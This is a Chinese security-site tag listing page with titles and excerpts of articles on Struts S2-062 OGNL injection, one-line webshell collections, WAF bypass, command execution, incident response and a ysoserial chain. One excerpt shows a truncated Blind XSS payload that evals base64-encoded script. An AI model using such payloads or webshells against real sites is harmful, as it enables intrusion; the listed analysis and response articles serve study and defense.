eval - 第 17 | CN-SEC 中文网

安全文章

S2-062漏洞原理分析

S2-062漏洞形成的原因是struts在处理标签的name属性时，将用户输入当作表达式进行二次解释，导致OGNL表达式注入。和S2-061/S2-059类似，不过S2-061和S2-05...

07月27日219 views评论

阅读全文

安全文章

渗透干货｜史上最全一句话木马

目录PHP 普通一句话 PHP系列过狗一句话 PHP过狗几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一句话JSP...

07月25日288 views评论

阅读全文

安全文章

实战|记一次iis+aspx环境下利用http参数污染绕过waf

环境介绍Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.waf：某不知名waf漏洞点情况新建模板处，可以直接写入内容到文件：但是一写入正常的aspx语句...

07月18日68 views评论

阅读全文

安全闲碎

URLMon应用实践(5)：阒寂无声，网页暗链的自动化识别

0 系统概况 &nb...

07月11日66 views评论

阅读全文

安全文章

代码执行和命令执行

代码执行代码执行:未严格过滤用户输入的参数,导致用户可以通过传参在web服务器上执行恶意代码.可变函数:一个变量名后面如果有圆括号,php将寻找与变量值同名的函数并尝试执行.evaleval:将一个字...

07月06日109 views评论

阅读全文

安全文章

干货｜史上最全一句话木马

一句话木马目录PHP 普通一句话 PHP系列过狗一句话 PHP过狗几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一...

07月02日47 views已关闭评论

阅读全文

安全文章

Python在线编程导致命令执行（二）

之前的案例《某Python学习网站在线编码导致命令执行》漏洞修复后再次绕过的两种方法。测试仍以黑名单形式过滤关键字。且只过滤用户输入，并未影响到运行时。思路：这种过滤使用混淆(字符拼接、编码等)即...

06月26日86 views评论

阅读全文

史上最全一句话木马

目录PHP 普通一句话 PHP系列过狗一句话 PHP过狗几个变性的php--过防火墙 phpv9 高版本拿shellASP asp 一句话 ASP过安全狗一句话 ASPX系列 aspx一句话JSP...

06月22日安全文章372 views评论

阅读全文

安全文章

Blind XSS

Payload："><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...

06月07日26 views评论

阅读全文

应急响应

Linux 应急响应

一. 账户安全 /etc/passwd /etc/shadow 格式：用户名：密码：用户ID：组ID：用户说明：家（home）目录：登陆之后shell 注意：无密码只允许本机登陆，远程不允许ssh登陆...

05月23日20 views评论

阅读全文

那些强悍的PHP一句话后门

那些强悍的PHP一句话后门我们以一个学习的心态来对待这些PHP后门程序，很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼，经常要换...

05月17日安全博客59 views评论

阅读全文

代码审计

ysoserial分析之Clojure利用链

0x01 前言这个漏洞给我的感觉和Groovy有点像，都是在 Java 上解析和执行命令，也属于Lisp编程语言，本文着重点在于分析如何触发漏洞，具体的解析流程可能不会过于深入，分析不到位的地方，大佬...

05月15日149 views评论

阅读全文

S2-062漏洞原理分析

渗透干货｜史上最全一句话木马

实战|记一次iis+aspx环境下利用http参数污染绕过waf

URLMon应用实践(5)：阒寂无声，网页暗链的自动化识别

代码执行和命令执行

干货｜史上最全一句话木马

Python在线编程导致命令执行（二）

史上最全一句话木马

Blind XSS

那些强悍的PHP一句话后门

ysoserial分析之Clojure利用链

在线咨询

微信